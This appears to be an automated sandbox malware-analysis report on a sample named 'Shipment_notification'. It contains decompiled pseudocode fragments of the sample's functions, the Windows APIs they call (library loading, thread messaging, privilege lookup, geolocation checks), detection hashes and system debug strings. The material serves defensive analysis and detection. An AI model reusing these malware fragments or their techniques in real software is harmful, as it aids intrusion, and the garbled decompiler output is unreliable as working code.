                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 41e8f3-41e90c 86 41e912-41e91b ExitProcess 85->86 87 41e90d call 41f213 85->87 87->86
                                                                                C-Code - Quality: 100%
                                                                                			E0041E8F3(intOrPtr _a4, int _a8) {
                                                                                				void* _t10;
                                                                                
                                                                                				E0041F213( *((intOrPtr*)(_a4 + 0x890)), _a4, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x890)), 0, 0x36, _t10);
                                                                                				ExitProcess(_a8);
                                                                                			}




                                                                                0x0041e90d
                                                                                0x0041e91b

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E91B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: G5@
                                                                                • API String ID: 621844428-1585037681
                                                                                • Opcode ID: 4d86f6eab3956e3221f691deff94274828b67c33ff55812aa02860a8a29c985a
                                                                                • Instruction ID: fb451d8b7e59288c5661e62a9459df07397a11b1f932154924971f483ef9b8f5
                                                                                • Opcode Fuzzy Hash: 4d86f6eab3956e3221f691deff94274828b67c33ff55812aa02860a8a29c985a
                                                                                • Instruction Fuzzy Hash: 9BD0C2316002047FC620EBC8CC45FE3379CEF44650F0480A5BA4C5B241C630BA00C7E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 88 41e8e5-41e91b call 41f213 ExitProcess
                                                                                C-Code - Quality: 68%
                                                                                			E0041E8E5(intOrPtr _a4, int _a8) {
                                                                                				signed int _t5;
                                                                                				void* _t13;
                                                                                
                                                                                				asm("das");
                                                                                				 *0xec8b5574 =  *0xec8b5574 | _t5 | 0x1be55785;
                                                                                				E0041F213( *((intOrPtr*)(_a4 + 0x890)), _a4, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x890)), 0, 0x36, _t13);
                                                                                				ExitProcess(_a8);
                                                                                			}





                                                                                0x0041e8ea
                                                                                0x0041e8f0
                                                                                0x0041e90d
                                                                                0x0041e91b

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E91B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: G5@
                                                                                • API String ID: 621844428-1585037681
                                                                                • Opcode ID: 0c822b09f59aa754499ead228271f1f98c22c96f7353faa335723b8ec65232e3
                                                                                • Instruction ID: 9bffe224eaa3cac599bd7a61e0cedb3719dbaf93cb2e393d87e64cfb091599c0
                                                                                • Opcode Fuzzy Hash: 0c822b09f59aa754499ead228271f1f98c22c96f7353faa335723b8ec65232e3
                                                                                • Instruction Fuzzy Hash: 6FE0C279B00200BFC720EFA4CD85FE73FA9AF05694F0580A9BA885F242C670AA01C795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 383 4098f7-4098f9 384 409945-40995b 383->384 385 4098fb call 40cee3 call 402de3 call 4195b3 383->385 387 409963-409995 call 410303 call 41e743 384->387 405 4098f0-4098f6 385->405 406 4098b9-4098ca PostThreadMessageW 385->406 396 409997-40999f 387->396 397 4099ca-4099d2 387->397 400 4099a1-4099a8 396->400 401 4099b9-4099c3 396->401 400->401 403 4099aa-4099b1 400->403 401->387 404 4099c5-4099c8 401->404 403->401 407 4099b3-4099b7 403->407 408 4099f0-409a02 call 41e6d3 404->408 406->405 409 4098cc-4098ed call 40c5b3 406->409 407->401 410 4099d3-4099ed call 420163 407->410 408->397 417 409a04-409a6f call 41df53 408->417 409->405 410->408 417->397 420 409a75-409ad1 call 41df93 417->420 420->397 423 409ad7-409b24 call 41f6d3 call 41f6f3 call 420383 call 420163 call 4191a3 420->423
                                                                                C-Code - Quality: 32%
                                                                                			E004098F7(void* __ebx, void* __eflags) {
                                                                                				void* _t4;
                                                                                				int _t6;
                                                                                				long _t15;
                                                                                				void* _t16;
                                                                                				int _t17;
                                                                                				void* _t19;
                                                                                
                                                                                				asm("adc esp, ebp");
                                                                                				asm("loopne 0x4c");
                                                                                				_push(_t16); // executed
                                                                                				_t4 = E0040CEE3(__eflags); // executed
                                                                                				_t6 = E004195B3(_t16, _t4, 0, 0, E00402DE3(0x2edf3f3f));
                                                                                				_t17 = _t6;
                                                                                				if(_t17 != 0) {
                                                                                					_t15 =  *(_t19 + 0xc);
                                                                                					_t6 = PostThreadMessageW(_t15, 0x111, 0, 0); // executed
                                                                                					if(_t6 == 0) {
                                                                                						_t6 =  *_t17(_t15, 0x8003, _t19 + (E0040C5B3(1, 8, __ebx + 0x874) & 0x000000ff) - 0x40, _t6);
                                                                                					}
                                                                                				}
                                                                                				return _t6;
                                                                                			}










                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: cd066795df68b1277eac19a887ded8432d6587d6991ec6b597d0668f58931636
                                                                                • Instruction ID: 0a7f5cea78c0af45a8da72c6c271f96aa2f7ba8f7ce672b3000da44c6b93de3c
                                                                                • Opcode Fuzzy Hash: cd066795df68b1277eac19a887ded8432d6587d6991ec6b597d0668f58931636
                                                                                • Instruction Fuzzy Hash: C551C3B0A01305AFD724DF25DC86BEB73E8EB05304F10456EF949A7381DB78AE418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 409826-409828 435 409890 434->435 436 40982a-40982e 434->436 439 4098b2-4098b7 435->439 440 409892-4098b0 call 40cee3 call 402de3 call 4195b3 435->440 437 409830 436->437 438 4097bc-4097c5 436->438 437->435 441 4097b6-4097ba 438->441 442 4097c7-4097f1 call 420383 call 420163 438->442 443 4098f0-4098f6 439->443 444 4098b9-4098ca PostThreadMessageW 439->444 440->439 441->438 441->442 444->443 447 4098cc-4098ed call 40c5b3 444->447 447->443
                                                                                C-Code - Quality: 44%
                                                                                			E00409826(short* __ecx, void* __eflags) {
                                                                                				void* __esi;
                                                                                				int _t9;
                                                                                				void* _t12;
                                                                                				short* _t23;
                                                                                				long _t29;
                                                                                				int _t32;
                                                                                				void* _t35;
                                                                                
                                                                                				_t23 = __ecx;
                                                                                				if(__eflags != 0) {
                                                                                					if(__eflags < 0) {
                                                                                						_push(_t32); // executed
                                                                                						_t12 = E0040CEE3(__eflags); // executed
                                                                                						_t9 = E004195B3(_t32, _t12, 0, 0, E00402DE3(0x2edf3f3f));
                                                                                						_t32 = _t9;
                                                                                					}
                                                                                					__eflags = _t32;
                                                                                					if(_t32 != 0) {
                                                                                						_t29 =  *(_t35 + 0xc);
                                                                                						_t9 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
                                                                                						__eflags = _t9;
                                                                                						if(_t9 == 0) {
                                                                                							__eflags = 0x92d;
                                                                                							_t9 =  *_t32(_t29, 0x8003, _t35 + (E0040C5B3(1, 8, 0x92d) & 0x000000ff) - 0x40, _t9);
                                                                                						}
                                                                                					}
                                                                                					return _t9;
                                                                                				} else {
                                                                                					asm("aam 0xba");
                                                                                					asm("lodsb");
                                                                                					_pop(__eax);
                                                                                					if(__eflags != 0) {
                                                                                						while(1) {
                                                                                							 *_t23 = 0;
                                                                                							_t23 = _t23 - 2;
                                                                                							_t9 = _t9 - 1;
                                                                                							if(_t9 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							if( *_t23 != 0x5c) {
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						E00420163( *((intOrPtr*)(_t35 + 0x10)), _t35 - 0x208, E00420383(_t35 - 0x208) + _t15);
                                                                                						return 0;
                                                                                					} else {
                                                                                						asm("sbb bl, [edx+eax*2-0x6a197aa]");
                                                                                						_push(__esi);
                                                                                						asm("adc eax, ebp");
                                                                                						__eax = __eax ^ 0x83000163;
                                                                                						__eflags = __eax;
                                                                                						asm("les eax, [ebx+ecx*4]");
                                                                                						asm("lock call 0x161f1");
                                                                                						__eax = __eax + __esi + 0x1000;
                                                                                						__esi = 0x11c6f95e;
                                                                                						return __eax;
                                                                                					}
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 5628ca8e08e777140ad9ad9f9da3ec236d1ef9a60c9e00e9a96731ba31d01b4d
                                                                                • Instruction ID: d66bc7d12d365ba35ff73bcd331e52d2c0967b730b952776c25f27f339125059
                                                                                • Opcode Fuzzy Hash: 5628ca8e08e777140ad9ad9f9da3ec236d1ef9a60c9e00e9a96731ba31d01b4d
                                                                                • Instruction Fuzzy Hash: DA11E763A5021466DA20AA65AC42BFB22599B51714F5842BBFA04FA2C3EA795D0142D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 459 41e8a5-41e8b1 460 41e8b3-41e8ca call 41f213 459->460 461 41e925-41e97b call 41f213 459->461 464 41e8cf-41e8e4 RtlFreeHeap 460->464
                                                                                C-Code - Quality: 43%
                                                                                			E0041E8A5(void* __eax, signed char* __ecx, void* __edx, void* __edi, void* _a4, long _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
                                                                                				intOrPtr _v0;
                                                                                				char _t34;
                                                                                				void* _t54;
                                                                                				intOrPtr* _t55;
                                                                                
                                                                                				_push(cs);
                                                                                				 *__ecx =  *__ecx & 0x000000ff;
                                                                                				asm("outsb");
                                                                                				if(__edi - 1 < 0) {
                                                                                					asm("in al, dx");
                                                                                					_t24 = _a8;
                                                                                					_t9 = _t24 + 0x890; // 0x5aefd17a
                                                                                					_t10 = _t24 + 0xaac; // 0x40af4b
                                                                                					_t55 = _t10;
                                                                                					E0041F213( *_t9, _a8, _t55,  *_t9, 0, 0x37, _t54);
                                                                                					return  *((intOrPtr*)( *_t55))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _a56);
                                                                                				} else {
                                                                                					_t4 = _v0 + 0xaa0; // 0xaa0
                                                                                					E0041F213( *((intOrPtr*)(_v0 + 0x14)), _t31, _t4,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x35, _t54);
                                                                                					_t34 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                                					return _t34;
                                                                                				}
                                                                                			}








                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,B4CA94F2,00000000,?), ref: 0041E8E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: e93a13d72c2344c902acb8c86f8b8af0cf33ecac48afd69637f32b49ada5532e
                                                                                • Instruction ID: 158c02eab6a9d0bb0fb2c308271c8f1e82c9818b3fe0a9f5157cd3582a946522
                                                                                • Opcode Fuzzy Hash: e93a13d72c2344c902acb8c86f8b8af0cf33ecac48afd69637f32b49ada5532e
                                                                                • Instruction Fuzzy Hash: 2A211AB2204108AFCB14DF99DC44EEB37ADEF8D764F158258FA4D97291C630E951CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 58%
                                                                                			E00409863(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                				char _v67;
                                                                                				char _v68;
                                                                                				int _t12;
                                                                                				void* _t16;
                                                                                				long _t23;
                                                                                				int _t25;
                                                                                				void* _t26;
                                                                                				void* _t30;
                                                                                
                                                                                				_t30 = __eflags;
                                                                                				_v68 = 0;
                                                                                				E004201E3( &_v67, 0, 0x3f);
                                                                                				_t12 = E00420C93( &_v68, 3);
                                                                                				_t18 = _a4;
                                                                                				_push( &_v68);
                                                                                				_t25 = _a4 + 0x20;
                                                                                				if(_t30 < 0) {
                                                                                					_push(_t25); // executed
                                                                                					_t16 = E0040CEE3(_t30); // executed
                                                                                					_t12 = E004195B3(_t25, _t16, 0, 0, E00402DE3(0x2edf3f3f));
                                                                                					_t25 = _t12;
                                                                                				}
                                                                                				if(_t25 != 0) {
                                                                                					_t23 = _a8;
                                                                                					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                                                                					if(_t12 == 0) {
                                                                                						return  *_t25(_t23, 0x8003, _t26 + (E0040C5B3(1, 8, _t18 + 0x874) & 0x000000ff) - 0x40, _t12);
                                                                                					}
                                                                                				}
                                                                                				return _t12;
                                                                                			}












                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: b248be3027dfd036a61d52b0a6598d3c4634be19f75245087f33f404c89d3479
                                                                                • Instruction ID: dc9b969e7c48ca82d68593da8a01ca9fdb5293d2f28ad7bbdbe57e762768817d
                                                                                • Opcode Fuzzy Hash: b248be3027dfd036a61d52b0a6598d3c4634be19f75245087f33f404c89d3479
                                                                                • Instruction Fuzzy Hash: 9801DB72A40318B7E710A6919C82FFF376C9B40B54F140129FF04BA2C2DAA8AD0547E9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 509 41ea08-41ea11 510 41ea13-41ea2d call 41f213 509->510 511 41e99e 509->511 515 41ea32-41ea47 LookupPrivilegeValueW 510->515 512 41e9a0-41e9a5 511->512 513 41e9a8-41e9b7 511->513 512->513
                                                                                C-Code - Quality: 22%
                                                                                			E0041EA08(void* __edi, signed int __esi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				int _v0;
                                                                                				void* __ebp;
                                                                                				intOrPtr* _t10;
                                                                                				intOrPtr _t13;
                                                                                				signed int _t17;
                                                                                				signed int _t22;
                                                                                
                                                                                				asm("adc eax, 0x17c19e08");
                                                                                				_t17 = __esi & 0xfffffff9;
                                                                                				_t22 = _t17;
                                                                                				if(_t22 > 0) {
                                                                                					if(_t22 < 0) {
                                                                                						 *_t10 =  *_t10 + _t10;
                                                                                						_t13 = _a20;
                                                                                						_t10 = _a16;
                                                                                					}
                                                                                					return  *((intOrPtr*)( *_t17))(_a12, _t10, _t13);
                                                                                				} else {
                                                                                					__ebp = __esp;
                                                                                					__eax = _v0;
                                                                                					__eax = _a8;
                                                                                					__esp = __esp + 0x14;
                                                                                					__eax = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                                					__esi = __ebp;
                                                                                					_pop(__ebp);
                                                                                					return __eax;
                                                                                				}
                                                                                			}










                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEB5,0040FEB5,?,00000000,?,?), ref: 0041EA43
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 109c2b410f2cf4dfc690fabb8d12f0f1cde150f3a80386b1063adefbecdb30a0
                                                                                • Instruction ID: 31181cc0f49a02b331626beb85e6f2280699e734c2da2338b02e7fad206ebf2d
                                                                                • Opcode Fuzzy Hash: 109c2b410f2cf4dfc690fabb8d12f0f1cde150f3a80386b1063adefbecdb30a0
                                                                                • Instruction Fuzzy Hash: 5BF08CF6604204ABDB20EF59DC40EEB73A9EF84624F058155FD4857282C631E850CBB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 517 40ceda-40cedd 518 40cf2e 517->518 519 40cedf-40cf0c call 420ee3 517->519 521 40cf30-40cf41 call 41f783 518->521 524 40cf12-40cf20 call 421403 519->524 525 40cf0e-40cf11 519->525 528 40cf43-40cf57 LdrLoadDll 521->528 529 40cf5a-40cf5d 521->529 524->521 531 40cf22-40cf2d call 421683 524->531 528->529 531->521
                                                                                C-Code - Quality: 89%
                                                                                			E0040CEDA(void* __eax, void* __eflags) {
                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                				void* _t23;
                                                                                				struct _OBJDIR_INFORMATION _t25;
                                                                                
                                                                                				 *0xFFFFFFFFEC8B550B =  !( *0xFFFFFFFFEC8B550B);
                                                                                				if(__eflags == 0) {
                                                                                					L6:
                                                                                					asm("les ecx, [eax]");
                                                                                					goto L7;
                                                                                				} else {
                                                                                					_push(0xec8b5544);
                                                                                					 *0xFFFFFFFFEC8B5540 = 0xffffffffec8b5330;
                                                                                					_t23 = E00420EE3(0xffffffffec8b553c, 0x104,  *0xFFFFFFFFEC8B5550);
                                                                                					if(_t23 != 0) {
                                                                                						_t25 = E00421403(__eflags,  *((intOrPtr*)(0xffffffffec8b5540)));
                                                                                						__eflags = _t25;
                                                                                						if(_t25 != 0) {
                                                                                							E00421683(0xffffffffec8b553c, 0);
                                                                                							goto L6;
                                                                                						}
                                                                                						L7:
                                                                                						_t17 = E0041F783( *((intOrPtr*)(0xffffffffec8b5540)));
                                                                                						 *0xFFFFFFFFEC8B5538 = _t17;
                                                                                						__eflags = _t17;
                                                                                						if(_t17 == 0) {
                                                                                							LdrLoadDll(0, 0, 0xffffffffec8b553c, 0xffffffffec8b5538); // executed
                                                                                							_t17 =  *0xFFFFFFFFEC8B5538;
                                                                                						}
                                                                                						return _t17;
                                                                                					} else {
                                                                                						return _t23;
                                                                                					}
                                                                                				}
                                                                                			}







                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: fd75c15cc45b9523ee819df40a56c88ad65438f5761ff60e2e265aff708c0c7e
                                                                                • Instruction ID: 0f4affe130e25fad1bc603e3705e8b5f2aaa7d88b3879a8a62bc0942e3d9f2ea
                                                                                • Opcode Fuzzy Hash: fd75c15cc45b9523ee819df40a56c88ad65438f5761ff60e2e265aff708c0c7e
                                                                                • Instruction Fuzzy Hash: 0FF06275D4010EABCB00DB94D981AEDB374AB44308F00829AE918AB280E5349A588B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00410063(intOrPtr _a4) {
                                                                                				intOrPtr* _t7;
                                                                                				void* _t8;
                                                                                
                                                                                				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                                				if(_t7 != 0) {
                                                                                					_t8 =  *_t7(0x10); // executed
                                                                                					return 0 | _t8 == 0x000000f1;
                                                                                				} else {
                                                                                					return _t7;
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 0041008D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: User
                                                                                • String ID:
                                                                                • API String ID: 765557111-0
                                                                                • Opcode ID: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                • Instruction ID: ea4a54c2336c31a8fb6bc0c082717e72071dcac9837b84e3ca3e21831ded48f4
                                                                                • Opcode Fuzzy Hash: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                • Instruction Fuzzy Hash: 76E0C273A8030466FA3091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                • Instruction ID: 48c748e902c44044de1d1892783f5007a8ec5904af658d79bb1b07a4e6c6e50d
                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                • Instruction Fuzzy Hash: 08E046B6600208ABCB24EF89DC45EE737ADEF88764F018059FE085B242C630F914CAF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,B4CA94F2,00000000,?), ref: 0041E8E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                • Instruction ID: eb5ae98e075ab63003722d577f40a8e5fd82e897943c343f669005370879adf1
                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                • Instruction Fuzzy Hash: 38E012B5600208ABCB24EF89DC49EA737ADAF88754F018059BA095B282C630E914CAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEB5,0040FEB5,?,00000000,?,?), ref: 0041EA43
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: bb6c04a6f9ab4fa2f1e18d158ab997fee5d61c5a47249bc15045aac120ba103c
                                                                                • Instruction ID: 033a7fb9fa2086201df8b3836a21ca132c55e4e19129a3f6e3396252481e1a2e
                                                                                • Opcode Fuzzy Hash: bb6c04a6f9ab4fa2f1e18d158ab997fee5d61c5a47249bc15045aac120ba103c
                                                                                • Instruction Fuzzy Hash: 96E01AB5600304ABC720EF89DC45EE737ADEF88654F018065BA0857242CA35E954CBF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 92044c28cb275009977861b89eee7390f2f734194cf05b9bdf586ea9625209e0
                                                                                • Instruction ID: a8596e45de4bd694f7978489d8cb5d382b53af46d3ac7a7f4d8895194d89b5eb
                                                                                • Opcode Fuzzy Hash: 92044c28cb275009977861b89eee7390f2f734194cf05b9bdf586ea9625209e0
                                                                                • Instruction Fuzzy Hash: 32B09B729014D5C9D716D7A446087177940B7D0745F56C4A5E1060641B4778C0B5F5B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01B9B323
                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01B9B476
                                                                                • The resource is owned shared by %d threads, xrefs: 01B9B37E
                                                                                • a NULL pointer, xrefs: 01B9B4E0
                                                                                • *** Inpage error in %ws:%s, xrefs: 01B9B418
                                                                                • an invalid address, %p, xrefs: 01B9B4CF
                                                                                • *** enter .exr %p for the exception record, xrefs: 01B9B4F1
                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01B9B48F
                                                                                • This failed because of error %Ix., xrefs: 01B9B446
                                                                                • The critical section is owned by thread %p., xrefs: 01B9B3B9
                                                                                • *** enter .cxr %p for the context, xrefs: 01B9B50D
                                                                                • The instruction at %p referenced memory at %p., xrefs: 01B9B432
                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01B9B352
                                                                                • <unknown>, xrefs: 01B9B27E, 01B9B2D1, 01B9B350, 01B9B399, 01B9B417, 01B9B48E
                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01B9B39B
                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01B9B38F
                                                                                • The instruction at %p tried to %s , xrefs: 01B9B4B6
                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01B9B314
                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01B9B2DC
                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01B9B3D6
                                                                                • Go determine why that thread has not released the critical section., xrefs: 01B9B3C5
                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01B9B484
                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01B9B47D
                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01B9B305
                                                                                • The resource is owned exclusively by thread %p, xrefs: 01B9B374
